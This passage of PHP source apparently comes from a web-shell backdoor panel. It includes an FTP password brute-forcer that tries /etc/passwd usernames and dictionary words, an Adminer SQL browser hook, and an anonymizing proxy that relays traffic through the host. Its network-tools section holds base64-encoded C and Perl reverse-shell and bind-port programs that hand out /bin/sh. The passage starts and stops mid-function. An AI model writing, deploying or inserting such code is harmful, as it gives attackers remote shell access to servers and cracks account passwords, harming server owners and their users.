\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(@$_POST[\'reverse\']) {\r\n\t\t\t\t\t\t$tmp = "";\r\n\t\t\t\t\t\tfor($i=strlen($line[0])-1; $i>=0; --$i)\r\n\t\t\t\t\t\t\t$tmp .= $line[0][$i];\r\n\t\t\t\t\t\t++$attempts;\r\n\t\t\t\t\t\tif( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {\r\n\t\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\t\techo \'\'.htmlspecialchars($line[0]).\':\'.htmlspecialchars($tmp);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t} elseif($_POST[\'type\'] == 2) {\r\n\t\t\t$temp = @file($_POST[\'dict\']);\r\n\t\t\tif( is_array($temp) )\r\n\t\t\t\tforeach($temp as $line) {\r\n\t\t\t\t\t$line = trim($line);\r\n\t\t\t\t\t++$attempts;\r\n\t\t\t\t\tif( bruteForce($server[0],@$server[1], $_POST[\'login\'], $line) ) {\r\n\t\t\t\t\t\t$success++;\r\n\t\t\t\t\t\techo \'\'.htmlspecialchars($_POST[\'login\']).\':\'.htmlspecialchars($line).\'
\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t}\r\n\t\techo "Attempts: $attempts Success: $success

";\r\n\t}\r\n\techo \'

FTP bruteforce

\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'
Type
\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
\'\r\n\t\t.\'\'\r\n\t\t.\'\'\r\n\t\t.\'
Login
Dictionary
\'\r\n\t\t.\'
\';\r\n\techo \'
\';\r\n\thardFooter();\r\n}\r\n/* (С) 01.2020 Jakub Vrána */\r\nfunction actionSql() {\r\n\thardHeader();\r\n\t\r\n\t$adminer_url = \'adminer.php\';\r\n\t$adminer_functions = \'functions.js\';\r\n\t$adminer_editing = \'editing.js\';\r\n\r\n\techo"";\r\n\tif (file_exists($adminer_functions)) {\r\n\t\tif (file_exists($adminer_editing)) {\r\n\t\t} else {\r\n\t\t\techo "

Results

Warning: " .$GLOBALS[\'home_cwd\']. "/$adminer_editing file does not exist
";\r\n\t\t}\r\n\t} else {\r\n\t\tif (file_exists($adminer_editing)) {\r\n\t\t\techo "

Results

Warning: " .$GLOBALS[\'home_cwd\']. "/$adminer_functions file does not exist
";\r\n\t\t} else {\r\n\t\t\techo "

Results

Warning: " .$GLOBALS[\'home_cwd\']. "/$adminer_functions and ".$GLOBALS[\'home_cwd\']. "/$adminer_editing files does not exist
";\r\n\t\t}\r\n\t}\r\n\t\r\n\tif (file_exists($adminer_url)) {\r\n\t\techo "

Sql browser

";\r\n\t} else {\r\n\t\techo "

Not found

" .$GLOBALS[\'home_cwd\']. "/$adminer_url
file does not exist
";\r\n\t\thardFooter();\r\n\t};\r\n}\r\n/* (С) 02.2019 Abdul Ahad */\r\nfunction actionAnonymizer() {\r\n\t$whitelistPatterns = array();\r\n\t//To enable CORS (cross-origin resource sharing) for proxied sites, set $forceCORS to true.\r\n\t$forceCORS = false;\r\n\t//Set to false to report the client machine\'s IP address to proxied sites via the HTTP `x-forwarded-for` header.\r\n\t//Setting to false may improve compatibility with some sites, but also exposes more information about end users to proxied sites.\r\n\t$anonymize = true;\r\n\t//Start/default URL that that will be proxied when Proxy is first loaded in a browser/accessed directly with no URL to proxy.\r\n\t//If empty, Proxy will show its own landing page.\r\n\t$startURL = "";\r\n\t$landingExampleURL = "https://example.net";\r\n\t\r\n\tob_start("ob_gzhandler");\r\n\tif (version_compare(PHP_VERSION, "5.4.7", "<")) {\r\n\t\tdie("Proxy requires PHP version 5.4.7 or later.");\r\n\t}\r\n\t$requiredExtensions = [\'curl\', \'mbstring\', \'xml\'];\r\n\tforeach($requiredExtensions as $requiredExtension) {\r\n\t\tif (!extension_loaded($requiredExtension)) {\r\n\t\tdie("Proxy requires PHP\'s \\"" . $requiredExtension . "\\" extension. Please install/enable it on your server and try again.");\r\n\t\t}\r\n\t}\r\n\tfunction getHostnamePattern($hostname) {\r\n\t\t$escapedHostname = str_replace(".", "\\.", $hostname);\r\n\t\treturn "@^https?://([a-z0-9-]+\\.)*" . $escapedHostname . "@i";\r\n\t}\r\n\tfunction removeKeys(&$assoc, $keys2remove) {\r\n\t\t$keys = array_keys($assoc);\r\n\t\t$map = array();\r\n\t\t$removedKeys = array();\r\n\t\tforeach ($keys as $key) {\r\n\t\t$map[strtolower($key)] = $key;\r\n\t\t}\r\n\t\tforeach ($keys2remove as $key) {\r\n\t\t$key = strtolower($key);\r\n\t\tif (isset($map[$key])) {\r\n\t\t\tunset($assoc[$map[$key]]);\r\n\t\t\t$removedKeys[] = $map[$key];\r\n\t\t}\r\n\t\t}\r\n\t\treturn $removedKeys;\r\n\t}\r\n\t\r\n\tif (!function_exists("getallheaders")) {\r\n\t\tfunction getallheaders() {\r\n\t\t$result = array();\r\n\t\tforeach($_SERVER as $key => $value) {\r\n\t\t\tif (substr($key, 0, 5) == "HTTP_") {\r\n\t\t\t$key = str_replace(" ", "-", ucwords(strtolower(str_replace("_", " ", substr($key, 5)))));\r\n\t\t\t$result[$key] = $value;\r\n\t\t\t}\r\n\t\t}\r\n\t\treturn $result;\r\n\t\t}\r\n\t}\r\n\t$usingDefaultPort = (!isset($_SERVER["HTTPS"]) && $_SERVER["SERVER_PORT"] === 80) || (isset($_SERVER["HTTPS"]) && $_SERVER["SERVER_PORT"] === 443);\r\n\t$prefixPort = $usingDefaultPort ? "" : ":" . $_SERVER["SERVER_PORT"];\r\n\t$prefixHost = $_SERVER["HTTP_HOST"];\r\n\t$prefixHost = strpos($prefixHost, ":") ? implode(":", explode(":", $_SERVER["HTTP_HOST"], -1)) : $prefixHost;\r\n\tdefine("PROXY_PREFIX", "http" . (isset($_SERVER["HTTPS"]) ? "s" : "") . "://" . $prefixHost . $prefixPort . $_SERVER["SCRIPT_NAME"] . "?");\r\n\tfunction makeRequest($url) {\r\n\t\tglobal $anonymize;\r\n\t$user_agent = $_SERVER["HTTP_USER_AGENT"];\r\n\t\tif (empty($user_agent)) {\r\n\t\t$user_agent = "Mozilla/5.0 (compatible; Proxy)";\r\n\t\t}\r\n\t\t$ch = curl_init();\r\n\t\tcurl_setopt($ch, CURLOPT_USERAGENT, $user_agent);\r\n\t\t$browserRequestHeaders = getallheaders();\r\n\t\t$removedHeaders = removeKeys($browserRequestHeaders, array(\r\n\t\t"Accept-Encoding", //Throw away the browser\'s Accept-Encoding header if any and let cURL make the request using gzip if possible.\r\n\t\t"Content-Length",\r\n\t\t"Host",\r\n\t\t"Origin"\r\n\t\t)); \r\n\t\tarray_change_key_case($removedHeaders, CASE_LOWER);\r\n\t\tcurl_setopt($ch, CURLOPT_ENCODING, "");\r\n\t\t$curlRequestHeaders = array();\r\n\t\tforeach ($browserRequestHeaders as $name => $value) {\r\n\t\t$curlRequestHeaders[] = $name . ": " . $value;\r\n\t\t}\r\n\t\tif (!$anonymize) {\r\n\t\t$curlRequestHeaders[] = "X-Forwarded-For: " . $_SERVER["REMOTE_ADDR"];\r\n\t\t}\r\n\t\tif (array_key_exists(\'origin\', $removedHeaders)) {\r\n\t\t$urlParts = parse_url($url);\r\n\t\t$port = $urlParts[\'port\'];\r\n\t\t$curlRequestHeaders[] = "Origin: " . $urlParts[\'scheme\'] . "://" . $urlParts[\'host\'] . (empty($port) ? "" : ":" . $port);\r\n\t\t};\r\n\t\tcurl_setopt($ch, CURLOPT_HTTPHEADER, $curlRequestHeaders);\r\n\t\tswitch ($_SERVER["REQUEST_METHOD"]) {\r\n\t\tcase "POST":\r\n\t\t\tcurl_setopt($ch, CURLOPT_POST, true);\r\n\t\t\t$postData = Array();\r\n\t\t\tparse_str(file_get_contents("php://input"), $postData);\r\n\t\t\tif (isset($postData["ProxyFormAction"])) {\r\n\t\t\tunset($postData["ProxyFormAction"]);\r\n\t\t\t}\r\n\t\t\tcurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));\r\n\t\tbreak;\r\n\t\tcase "PUT":\r\n\t\t\tcurl_setopt($ch, CURLOPT_PUT, true);\r\n\t\t\tcurl_setopt($ch, CURLOPT_INFILE, fopen("php://input", "r"));\r\n\t\tbreak;\r\n\t\t}\r\n\t\tcurl_setopt($ch, CURLOPT_HEADER, true);\r\n\t\tcurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\r\n\t\tcurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\tcurl_setopt($ch, CURLOPT_URL, $url);\r\n\t\t$response = curl_exec($ch);\r\n\t\t$responseInfo = curl_getinfo($ch);\r\n\t\t$headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\r\n\t\tcurl_close($ch);\r\n\t\t$responseHeaders = substr($response, 0, $headerSize);\r\n\t\t$responseBody = substr($response, $headerSize);\r\n\t\treturn array("headers" => $responseHeaders, "body" => $responseBody, "responseInfo" => $responseInfo);\r\n\t}\r\n\tfunction rel2abs($rel, $base) {\r\n\t\tif (empty($rel)) $rel = ".";\r\n\t\tif (parse_url($rel, PHP_URL_SCHEME) != "" || strpos($rel, "//") === 0) return $rel; //Return if already an absolute URL\r\n\t\tif ($rel[0] == "#" || $rel[0] == "?") return $base.$rel; //Queries and anchors\r\n\t\textract(parse_url($base)); //Parse base URL and convert to local variables: $scheme, $host, $path\r\n\t\t$path = isset($path) ? preg_replace("#/[^/]*$#", "", $path) : "/"; //Remove non-directory element from path\r\n\t\tif ($rel[0] == "/") $path = ""; //Destroy path if relative url points to root\r\n\t\t$port = isset($port) && $port != 80 ? ":" . $port : "";\r\n\t\t$auth = "";\r\n\t\tif (isset($user)) {\r\n\t\t$auth = $user;\r\n\t\tif (isset($pass)) {\r\n\t\t\t$auth .= ":" . $pass;\r\n\t\t}\r\n\t\t$auth .= "@";\r\n\t\t}\r\n\t\t$abs = "$auth$host$port$path/$rel"; //Dirty absolute URL\r\n\t\tfor ($n = 1; $n > 0; $abs = preg_replace(array("#(/\\.?/)#", "#/(?!\\.\\.)[^/]+/\\.\\./#"), "/", $abs, -1, $n)) {} //Replace \'//\' or \'/./\' or \'/foo/../\' with \'/\'\r\n\t\treturn $scheme . "://" . $abs; //Absolute URL is ready.\r\n\t}\r\n\tfunction proxifyCSS($css, $baseURL) {\r\n\t\t$sourceLines = explode("\\n", $css);\r\n\t\t$normalizedLines = [];\r\n\t\tforeach ($sourceLines as $line) {\r\n\t\tif (preg_match("/@import\\s+url/i", $line)) {\r\n\t\t\t$normalizedLines[] = $line;\r\n\t\t} else {\r\n\t\t\t$normalizedLines[] = preg_replace_callback(\r\n\t\t\t"/(@import\\s+)([^;\\s]+)([\\s;])/i",\r\n\t\t\tfunction($matches) use ($baseURL) {\r\n\t\t\t\treturn $matches[1] . "url(" . $matches[2] . ")" . $matches[3];\r\n\t\t\t},\r\n\t\t\t$line);\r\n\t\t}\r\n\t\t}\r\n\t\t$normalizedCSS = implode("\\n", $normalizedLines);\r\n\t\treturn preg_replace_callback(\r\n\t\t"/url\\((.*?)\\)/i",\r\n\t\tfunction($matches) use ($baseURL) {\r\n\t\t\t$url = $matches[1];\r\n\t\t\tif (strpos($url, "\'") === 0) {\r\n\t\t\t\t$url = trim($url, "\'");\r\n\t\t\t}\r\n\t\t\tif (strpos($url, "\\"") === 0) {\r\n\t\t\t\t$url = trim($url, "\\"");\r\n\t\t\t}\r\n\t\t\tif (stripos($url, "data:") === 0) return "url(" . $url . ")"; //The URL isn\'t an HTTP URL but is actual binary data. Don\'t proxify it.\r\n\t\t\treturn "url(" . PROXY_PREFIX . rel2abs($url, $baseURL) . ")";\r\n\t\t},\r\n\t\t$normalizedCSS);\r\n\t}\r\n\tfunction proxifySrcset($srcset, $baseURL) {\r\n\t\t$sources = array_map("trim", explode(",", $srcset)); //Split all contents by comma and trim each value\r\n\t\t$proxifiedSources = array_map(function($source) use ($baseURL) {\r\n\t\t$components = array_map("trim", str_split($source, strrpos($source, " "))); //Split by last space and trim\r\n\t\t$components[0] = PROXY_PREFIX . rel2abs(ltrim($components[0], "/"), $baseURL); //First component of the split source string should be an image URL; proxify it\r\n\t\treturn implode($components, " "); //Recombine the components into a single source\r\n\t\t}, $sources);\r\n\t\t$proxifiedSrcset = implode(", ", $proxifiedSources); //Recombine the sources into a single "srcset"\r\n\t\treturn $proxifiedSrcset;\r\n\t}\r\n\tif (isset($_POST["ProxyFormAction"])) {\r\n\t\t$url = $_POST["ProxyFormAction"];\r\n\t\tunset($_POST["ProxyFormAction"]);\r\n\t} else {\r\n\t\t$queryParams = Array();\r\n\t\tparse_str($_SERVER["QUERY_STRING"], $queryParams);\r\n\t\tif (isset($queryParams["ProxyFormAction"])) {\r\n\t\t$formAction = $queryParams["ProxyFormAction"];\r\n\t\tunset($queryParams["ProxyFormAction"]);\r\n\t\t$url = $formAction . "?" . http_build_query($queryParams);\r\n\t\t} else {\r\n\t\t$url = substr($_SERVER["REQUEST_URI"], strlen($_SERVER["SCRIPT_NAME"]) + 1);\r\n\t\t}\r\n\t}\r\n\tif (empty($url)) {\r\n\t\tif (empty($startURL)) {\r\n\t\t\thardHeader();\r\n\t\t\techo "

Anonymizer

Proxy can be directly invoked like this: " . PROXY_PREFIX . $landingExampleURL . "

Or, you can simply enter a URL below:

";\r\n\t\t\thardFooter();\r\n\t\t\tdie();\r\n\t\t} else {\r\n\t\t\t$url = $startURL;\r\n\t\t}\r\n\t} else if (strpos($url, ":/") !== strpos($url, "://")) {\r\n\t\t//Work around the fact that some web servers (e.g. IIS 8.5) change double slashes appearing in the URL to a single slash.\r\n\t\t$pos = strpos($url, ":/");\r\n\t\t$url = substr_replace($url, "://", $pos, strlen(":/"));\r\n\t}\r\n\t$scheme = parse_url($url, PHP_URL_SCHEME);\r\n\tif (empty($scheme)) {\r\n\t\t//Assume that any supplied URLs starting with // are HTTP URLs.\r\n\t\tif (strpos($url, "//") === 0) {\r\n\t\t$url = "http:" . $url;\r\n\t\t}\r\n\t} else if (!preg_match("/^https?$/i", $scheme)) {\r\n\t\tdie(\'Error: Detected a "\' . $scheme . \'" URL. Proxy exclusively supports http[s] URLs.\');\r\n\t}\r\n\t$urlIsValid = count($whitelistPatterns) === 0;\r\n\tforeach ($whitelistPatterns as $pattern) {\r\n\t\tif (preg_match($pattern, $url)) {\r\n\t\t$urlIsValid = true;\r\n\t\tbreak;\r\n\t\t}\r\n\t}\r\n\tif (!$urlIsValid) {\r\n\t\tdie("Error: The requested URL was disallowed by the server adFc7strator.");\r\n\t}\r\n\t\r\n\t$response = makeRequest($url);\r\n\t$rawResponseHeaders = $response["headers"];\r\n\t$responseBody = $response["body"];\r\n\t$responseInfo = $response["responseInfo"];\r\n\t$responseURL = $responseInfo["url"];\r\n\tif ($responseURL !== $url) {\r\n\t\theader("Location: " . PROXY_PREFIX . $responseURL, true);\r\n\t\texit(0);\r\n\t}\r\n\t$header_blacklist_pattern = "/^Content-Length|^Transfer-Encoding|^Content-Encoding.*gzip/i";\r\n\t$responseHeaderBlocks = array_filter(explode("\\r\\n\\r\\n", $rawResponseHeaders));\r\n\t$lastHeaderBlock = end($responseHeaderBlocks);\r\n\t$headerLines = explode("\\r\\n", $lastHeaderBlock);\r\n\tforeach ($headerLines as $header) {\r\n\t\t$header = trim($header);\r\n\t\tif (!preg_match($header_blacklist_pattern, $header)) {\r\n\t\theader($header, false);\r\n\t\t}\r\n\t}\r\n\theader("X-Robots-Tag: noindex, nofollow", true);\r\n\t\r\n\tif ($forceCORS) {\r\n\t\theader("Access-Control-Allow-Origin: *", true);\r\n\t\theader("Access-Control-Allow-Credentials: true", true);\r\n\t\r\n\t\tif ($_SERVER["REQUEST_METHOD"] == "OPTIONS") {\r\n\t\tif (isset($_SERVER["HTTP_ACCESS_CONTROL_REQUEST_METHOD"])) {\r\n\t\t\theader("Access-Control-Allow-Methods: GET, POST, OPTIONS", true);\r\n\t\t}\r\n\t\tif (isset($_SERVER["HTTP_ACCESS_CONTROL_REQUEST_HEADERS"])) {\r\n\t\t\theader("Access-Control-Allow-Headers: {$_SERVER[\'HTTP_ACCESS_CONTROL_REQUEST_HEADERS\']}", true);\r\n\t\t}\r\n\t\texit(0);\r\n\t\t}\r\n\t\r\n\t}\r\n\t\r\n\t$contentType = "";\r\n\tif (isset($responseInfo["content_type"])) $contentType = $responseInfo["content_type"];\r\n\t\r\n\tif (stripos($contentType, "text/html") !== false) {\r\n\t\r\n\t\t$detectedEncoding = mb_detect_encoding($responseBody, "UTF-8, ISO-8859-1");\r\n\t\tif ($detectedEncoding) {\r\n\t\t$responseBody = mb_convert_encoding($responseBody, "HTML-ENTITIES", $detectedEncoding);\r\n\t\t}\r\n\t\t$doc = new DomDocument();\r\n\t\t@$doc->loadHTML($responseBody);\r\n\t\t$xpath = new DOMXPath($doc);\r\n\t\r\n\t\t//Rewrite forms so that their actions point back to the proxy.\r\n\t\tforeach($xpath->query("//form") as $form) {\r\n\t\t$method = $form->getAttribute("method");\r\n\t\t$action = $form->getAttribute("action");\r\n\t\t$action = empty($action) ? $url : rel2abs($action, $url);\r\n\t\t$form->setAttribute("action", rtrim(PROXY_PREFIX, "?"));\r\n\t\t$actionInput = $doc->createDocumentFragment();\r\n\t\t$actionInput->appendXML(\'\');\r\n\t\t$form->appendChild($actionInput);\r\n\t\t}\r\n\t\tforeach ($xpath->query("//meta[@http-equiv]") as $element) {\r\n\t\tif (strcasecmp($element->getAttribute("http-equiv"), "refresh") === 0) {\r\n\t\t\t$content = $element->getAttribute("content");\r\n\t\t\tif (!empty($content)) {\r\n\t\t\t$splitContent = preg_split("/=/", $content);\r\n\t\t\tif (isset($splitContent[1])) {\r\n\t\t\t\t$element->setAttribute("content", $splitContent[0] . "=" . PROXY_PREFIX . rel2abs($splitContent[1], $url));\r\n\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\t}\r\n\t\tforeach($xpath->query("//style") as $style) {\r\n\t\t$style->nodeValue = proxifyCSS($style->nodeValue, $url);\r\n\t\t}\r\n\t\tforeach ($xpath->query("//*[@style]") as $element) {\r\n\t\t$element->setAttribute("style", proxifyCSS($element->getAttribute("style"), $url));\r\n\t\t}\r\n\t\tforeach ($xpath->query("//img[@srcset]") as $element) {\r\n\t\t$element->setAttribute("srcset", proxifySrcset($element->getAttribute("srcset"), $url));\r\n\t\t}\r\n\t\t$proxifyAttributes = array("href", "src");\r\n\t\tforeach($proxifyAttributes as $attrName) {\r\n\t\tforeach($xpath->query("//*[@" . $attrName . "]") as $element) { //For every element with the given attribute...\r\n\t\t\t$attrContent = $element->getAttribute($attrName);\r\n\t\t\tif ($attrName == "href" && preg_match("/^(about|javascript|magnet|mailto):|#/i", $attrContent)) continue;\r\n\t\t\tif ($attrName == "src" && preg_match("/^(data):/i", $attrContent)) continue;\r\n\t\t\t$attrContent = rel2abs($attrContent, $url);\r\n\t\t\t$attrContent = PROXY_PREFIX . $attrContent;\r\n\t\t\t$element->setAttribute($attrName, $attrContent);\r\n\t\t}\r\n\t\t}\r\n\t\t$head = $xpath->query("//head")->item(0);\r\n\t\t$body = $xpath->query("//body")->item(0);\r\n\t\t$prependElem = $head != NULL ? $head : $body;\r\n\t\tif ($prependElem != NULL) {\r\n\t\r\n\t\t$scriptElem = $doc->createElement("script",\r\n\t\t\t\'(function() {\r\n\t\r\n\t\t\tif (window.XMLHttpRequest) {\r\n\t\r\n\t\t\t\tfunction parseURI(url) {\r\n\t\t\t\tvar m = String(url).replace(/^\\s+|\\s+$/g, "").match(/^([^:\\/?#]+:)?(\\/\\/(?:[^:@]*(?::[^:@]*)?@)?(([^:\\/?#]*)(?::(\\d*))?))?([^?#]*)(\\?[^#]*)?(#[\\s\\S]*)?/);\r\n\t\t\t\t// authority = "//" + user + ":" + pass "@" + hostname + ":" port\r\n\t\t\t\treturn (m ? {\r\n\t\t\t\t\thref : m[0] || "",\r\n\t\t\t\t\tprotocol : m[1] || "",\r\n\t\t\t\t\tauthority: m[2] || "",\r\n\t\t\t\t\thost : m[3] || "",\r\n\t\t\t\t\thostname : m[4] || "",\r\n\t\t\t\t\tport : m[5] || "",\r\n\t\t\t\t\tpathname : m[6] || "",\r\n\t\t\t\t\tsearch : m[7] || "",\r\n\t\t\t\t\thash : m[8] || ""\r\n\t\t\t\t} : null);\r\n\t\t\t\t}\r\n\t\r\n\t\t\t\tfunction rel2abs(base, href) { // RFC 3986\r\n\t\r\n\t\t\t\tfunction removeDotSegments(input) {\r\n\t\t\t\t\tvar output = [];\r\n\t\t\t\t\tinput.replace(/^(\\.\\.?(\\/|$))+/, "")\r\n\t\t\t\t\t.replace(/\\/(\\.(\\/|$))+/g, "/")\r\n\t\t\t\t\t.replace(/\\/\\.\\.$/, "/../")\r\n\t\t\t\t\t.replace(/\\/?[^\\/]*/g, function (p) {\r\n\t\t\t\t\t\tif (p === "/..") {\r\n\t\t\t\t\t\toutput.pop();\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\toutput.push(p);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t});\r\n\t\t\t\t\treturn output.join("").replace(/^\\//, input.charAt(0) === "/" ? "/" : "");\r\n\t\t\t\t}\r\n\t\r\n\t\t\t\thref = parseURI(href || "");\r\n\t\t\t\tbase = parseURI(base || "");\r\n\t\r\n\t\t\t\treturn !href || !base ? null : (href.protocol || base.protocol) +\r\n\t\t\t\t(href.protocol || href.authority ? href.authority : base.authority) +\r\n\t\t\t\tremoveDotSegments(href.protocol || href.authority || href.pathname.charAt(0) === "/" ? href.pathname : (href.pathname ? ((base.authority && !base.pathname ? "/" : "") + base.pathname.slice(0, base.pathname.lastIndexOf("/") + 1) + href.pathname) : base.pathname)) +\r\n\t\t\t\t(href.protocol || href.authority || href.pathname ? href.search : (href.search || base.search)) +\r\n\t\t\t\thref.hash;\r\n\t\r\n\t\t\t\t}\r\n\t\r\n\t\t\t\tvar proxied = window.XMLHttpRequest.prototype.open;\r\n\t\t\t\twindow.XMLHttpRequest.prototype.open = function() {\r\n\t\t\t\t\tif (arguments[1] !== null && arguments[1] !== undefined) {\r\n\t\t\t\t\tvar url = arguments[1];\r\n\t\t\t\t\turl = rel2abs("\' . $url . \'", url);\r\n\t\t\t\t\turl = "\' . PROXY_PREFIX . \'" + url;\r\n\t\t\t\t\targuments[1] = url;\r\n\t\t\t\t\t}\r\n\t\t\t\t\treturn proxied.apply(this, [].slice.call(arguments));\r\n\t\t\t\t};\r\n\t\r\n\t\t\t}\r\n\t\r\n\t\t\t})();\'\r\n\t\t);\r\n\t\t$scriptElem->setAttribute("type", "text/javascript");\r\n\t\r\n\t\t$prependElem->insertBefore($scriptElem, $prependElem->firstChild);\r\n\t\r\n\t\t}\r\n\t\r\n\t\techo "\\n" . $doc->saveHTML();\r\n\t} else if (stripos($contentType, "text/css") !== false) { //This is CSS, so proxify url() references.\r\n\t\techo proxifyCSS($responseBody, $url);\r\n\t} else { //This isn\'t a web page or CSS, so serve unmodified through the proxy with the correct headers (images, JavaScript, etc.)\r\n\t\theader("Content-Length: " . strlen($responseBody), true);\r\n\t\techo $responseBody;\r\n\t}\r\n}\r\nfunction actionNetwork() {\r\n\thardHeader();\r\n\t$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";\r\n\t$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n\t$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";\r\n\t$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n\techo "

Network tools

\r\n\t
\r\n\tBind port to /bin/sh
